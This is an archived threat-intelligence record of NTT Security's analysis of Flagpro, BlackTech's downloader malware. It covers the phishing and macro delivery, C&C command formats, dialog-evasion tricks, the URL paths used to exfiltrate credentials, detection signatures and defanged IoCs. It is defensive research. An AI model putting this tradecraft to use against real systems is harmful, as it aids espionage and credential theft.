{ "id": "7d0a0b3e-24f1-4b8e-a168-338f0419982b", "created_at": "2026-04-06T00:11:19.196199Z", "updated_at": "2026-04-10T03:32:09.446769Z", "deleted_at": null, "sha1_hash": "c759a2089f71dd4809d180f16bff0115e96477ea", "title": "Flagpro: The new malware used by BlackTech", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 285742, "plain_text": "Flagpro: The new malware used by BlackTech\r\nBy NTTセキュリティ・ジャパン株式会社\r\nPublished: 2021-12-28 · Archived: 2026-04-05 18:31:44 UTC\r\nBy Hiroki Hada\r\nPublished December 28, 2021 | Japanese\r\nThis article is a translation of the \"標的型攻撃グループBlackTechが使用するマルウェアFlagproについて\".\r\n---\r\nIntroduction\r\nBlackTech has been actively attacking, some attack cases against Japanese companies were observed. BlackTech\r\nuses a new malware for these attack cases. We call it “Flagpro”. We are sharing its overview, timeline and detailed\r\nanalysis result in this article.\r\nAttack overview\r\nFlagpro is used in the initial stage of attacks to investigate target’s environment, download a second stage malware\r\nand execute it. An attack case using Flagpro starts with a spear phishing e-mail. The message is adjusted to its\r\ntarget organization. It is disguised as an e-mail communication with target’s business partner. This means the\r\nattackers probed deeper into their target before attacking.\r\nThe attackers attach a password protected archived file (ZIP or RAR) to the email, and they write its password in\r\nthe message. The archived file includes an xlsm format file and it contains a malicious macro. If a user activates\r\nthe macro, a malware will be dropped. They also adjust the contents of the xlsm file to the target. Therefore, it is\r\nnot easy to feel at odds with the file sent by the attacker.\r\nAfter the macro is executed, it creates an EXE file in startup directory. This EXE file is “Flagpro”. In the most\r\ncases, this created EXE files are named “dwm.exe”. When the system launches next time, Flagpro, which was\r\nplaced in startup directory as “dwm.exe”, will be executed.\r\nFlagpro communicates with a C\u0026C server, and it receives commands to execute from the server, or Flagpro\r\ndownloads a second stage malware and then executes it. The attackers check the target’s environment whether it is\r\nsuitable for running the second stage malware or not. If they determine to attack the target, another malware\r\nsample will be downloaded and executed.\r\nTimeline\r\nWe have observed attack cases using Flagpro against multiple companies (Defense, Media, Communications)\r\nseveral times. In October 2020, a sample related to Flagpro was submitted to an online service. Therefore, Flagpro\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 1 of 6\n\nmay have already been used for attacking cases at that point.\r\nFlagpro functions\r\nIn July 2021, our SOC observed new Flagpro using MFC(Microsoft Foundation Class) library for its\r\nimplementation. MFC library had not been used for old Flagpro. This Flagpro had classes such as\r\n”CV20_LoaderApp” and ”CV20_LoaderDlg”. We assume that the role of Flagpro is a downloader and the sample\r\nversion was 2.0 from these class names.\r\nWe call this sample using MFC as “Flagpro v2.0” and old one as “Flagpro v1.0” in this article.\r\nFollowing list indicates Flagpro’s main functions:\r\nDownload and execute a tool\r\nExecute OS commands and send the results\r\nCollect and send Windows authentication information\r\nThese commands are implemented in a member function of CV20_LoaderApp class in Flagpro v2.0.\r\nOnce Flagpro is launched, it communicate with a C\u0026C server and executes the received commands as shown in\r\nthe above list. After designated interval, it repeats this behavior.\r\nRegarding to downloading and executing a tool, Flagpro stores the downloaded file in file path\r\n“%Temp%\\~MY[0-9A-F].tmp” first. Then, Flagpro adds extension “.exe” to the name of stored file and executes\r\nthe file.\r\nIn the implementation of Flagpro v1.0, if a dialog titled “Windows セキュリティ” is displayed when Flagpro\r\naccesses to an external site, Flagpro automatically clicks OK button to close the dialog. This handling also works\r\nwhen the dialog is written Chinese and English. It can indicate the targets are Japan, Taiwan, and English-speaking countries. Flagpro v2.0 checks whether both username and password are filled in a dialog as an\r\nadditional feature before clicking the OK button.\r\nFlagpro v2.0 has another new function. If a dialog title is “Internet Explorer [7-11]” (the number after “Internet\r\nExplorer” depends on what version the user users) when Flagpro accesses to an external site, Flagpro sends\r\nWM_CLOSE message to close the dialog.\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 2 of 6\n\nWe assume that these functions, which close a dialog automatically, are implemented to reduce a risk that a user\r\ndetects an external connection by Flagpro.\r\nIn Flagpro v2.0, the same codes in below figure are repeatedly inserted to hide important as a handy obfuscation\r\ntechnique:\r\nReceived commands\r\nThe received commands from a C\u0026C server are encoded with Base64. Following format is the decoded command\r\nabout Flagpro v2.0:\r\nDownload Command field consists of two flags(Exec and Yes) and URL path like following:\r\nFirst string “Exec” is the action flag. If it is not included in both Download Command fields in the command,\r\nFlagpro will not execute the main processes such as downloading, executing OS commands, collecting\r\nauthentication information, and so on. Next string “Yes” is the execution flag. If a Download Command field has\r\n“ExecYes”, Flagpro downloads and executes the file. If a command is “Exec/malware.html” like the above image,\r\nFlagpro only downloads a file.\r\nTime Interval field means a number of waiting time for the next command. The unit is millisecond.\r\nFollowing image is an actual example of the received commands:\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 3 of 6\n\nCommunications with C\u0026C server\r\nConnection handlings to a C\u0026C server about Flagpro v1.0 and v2.0 uses COM objects of Internet Explorer.\r\nFlagpro communicates with C\u0026C server using HTTP.\r\nIn requesting commands, sending execution results of OS commands or collected authentication information,\r\nFlagpro accesses a C\u0026C server with specific URL paths and queries. It encodes data with Base64 and sends to the\r\nC\u0026C server. Following table shows relations between Flagpro’s activities and the URL paths and queries.\r\nRelated activities URL paths and queries\r\nRequest command /index.html\r\nSend result of OS command execution /index.htmld?flag=[Encoded Data]\r\nSend authentication information /index.htmld?flagpro=[Encoded Data]\r\nWhen Flagpro downloads a tool, there is no specific URL path because it uses the file name on the server.\r\nFollowing image shows a traffic when Flagpro v2.0 connects to a C\u0026C server:\r\nAs of July 2021, we do not know why, but we observed a response “Hello Boy!” from the C\u0026C server, when we\r\naccess to the arbitrary paths other than the URL paths shown in the table above. Following image is an example of\r\nthe response:\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 4 of 6\n\nDetections\r\nTo detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint\r\ndevices. For the network detection, Flagpro’s characteristic URL paths are useful such as index.htmld?flag=\r\n[Base64 string] and index.htmld?flagpro=[Base64 string].\r\nFor the endpoint detection, naming rules of temporary files that Flagpro create such as %TEMP%\\~MY[0-9A-F].tmp and %TEMP%\\~MY[0-9A-F].tmp.exe are effective. In addition, the investigation commands after Flagpro\r\nestablishes the connection with the C\u0026C server like following are also useful for detection. Following commands\r\nare a part of examples:\r\nConclusion\r\nWe have observed attack cases using Flagpro against Japan since October 2020. The attack techniques have not\r\nchanged a lot, but BlackTech uses more evading techniques. For example, they adjust decoy files and file names\r\nto their target and check carefully target’s environment. Recently, they have started using other new malwares\r\ncalled “SelfMake Loader” and “Spider RAT”. It means that they are actively developing new malwares.\r\nTherefore, you need to pay attention to the attacks from BlackTech.\r\nIoC\r\n54e6ea47eb04634d3e87fd7787e2136ccfbcc80ade34f246a12cf93bab527f6b\r\ne197c583f57e6c560b576278233e3ab050e38aa9424a5d95b172de66f9cfe970\r\n655ca39beb2413803af099879401e6d634942a169d2f57eb30f96154a78b2ad5\r\n840ce62f92fc519cd1a33b62f4b9f92a962b7fb28c12d2f607dec0b520e6a4b2\r\nba27ae12e6f3c2c87fd2478072dfa2747d368a507c69cd90b653c9e707254a1d\r\n77680fb906476f0d84e15d5032f09108fdef8933bcad0b941c9f375fedd0b2c9\r\ne81255ff6e0ed937603748c1442ce9d6588decf6922537037cf3f1a7369a8876\r\n45[.]76.184.227\r\n45[.]32.23.140\r\n139[.]162.87.180\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 5 of 6\n\n107[.]191.61.40\r\n172[.]104.109.217\r\norg.misecure[.]com\r\nupdate.centosupdates[.]com\r\nSource: https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia", "ETDA" ], "references": [ "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" ], "report_names": [ "flagpro-the-new-malware-used-by-blacktech" ], "threat_actors": [ { "id": "efa7c047-b61c-4598-96d5-e00d01dec96b", "created_at": "2022-10-25T16:07:23.404442Z", "updated_at": "2026-04-10T02:00:04.584239Z", "deleted_at": null, "main_name": "BlackTech", "aliases": [ "BlackTech", "Canary Typhoon", "Circuit Panda", "Earth Hundun", "G0098", "Manga Taurus", "Operation PLEAD", "Operation Shrouded Crossbow", "Operation Waterbear", "Palmerworm", "Radio Panda", "Red Djinn", "T-APT-03", "TEMP.Overboard" ], "source_name": "ETDA:BlackTech", "tools": [ "BIFROST", "BUSYICE", "BendyBear", "Bluether", "CAPGELD", "DRIGO", "Deuterbear", "Flagpro", "GOODTIMES", "Gh0stTimes", "IconDown", "KIVARS", "LOLBAS", "LOLBins", "Linopid", "Living off the Land", "TSCookie", "Waterbear", "XBOW", "elf.bifrose" ], "source_id": "ETDA", "reports": null }, { "id": "2646f776-792a-4498-967b-ec0d3498fdf1", "created_at": "2022-10-25T15:50:23.475784Z", "updated_at": "2026-04-10T02:00:05.269591Z", "deleted_at": null, "main_name": "BlackTech", "aliases": [ "BlackTech", "Palmerworm" ], "source_name": "MITRE:BlackTech", "tools": [ "Kivars", "PsExec", "TSCookie", "Flagpro", "Waterbear" ], "source_id": "MITRE", "reports": null }, { "id": "75024aad-424b-449a-b286-352fe9226bcb", "created_at": "2023-01-06T13:46:38.962724Z", "updated_at": "2026-04-10T02:00:03.164536Z", "deleted_at": null, "main_name": "BlackTech", "aliases": [ "CIRCUIT PANDA", "Temp.Overboard", "Palmerworm", "G0098", "T-APT-03", "Manga Taurus", "Earth Hundun", "Mobwork", "HUAPI", "Red Djinn", "Canary Typhoon" ], "source_name": "MISPGALAXY:BlackTech", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3b93ef3c-2baf-429e-9ccc-fb80d0046c3b", "created_at": "2025-08-07T02:03:24.569066Z", "updated_at": "2026-04-10T02:00:03.730864Z", "deleted_at": null, "main_name": "BRONZE CANAL", "aliases": [ "BlackTech", "CTG-6177 ", "Circuit Panda ", "Earth Hundun", "Palmerworm ", "Red Djinn", "Shrouded Crossbow " ], "source_name": "Secureworks:BRONZE CANAL", "tools": [ "Bifrose", "DRIGO", "Deuterbear", "Flagpro", "Gh0stTimes", "KIVARS", "PLEAD", "Spiderpig", "Waterbear", "XBOW" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434279, "ts_updated_at": 1775791929, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c759a2089f71dd4809d180f16bff0115e96477ea.pdf", "text": "https://archive.orkl.eu/c759a2089f71dd4809d180f16bff0115e96477ea.txt", "img": "https://archive.orkl.eu/c759a2089f71dd4809d180f16bff0115e96477ea.jpg" } }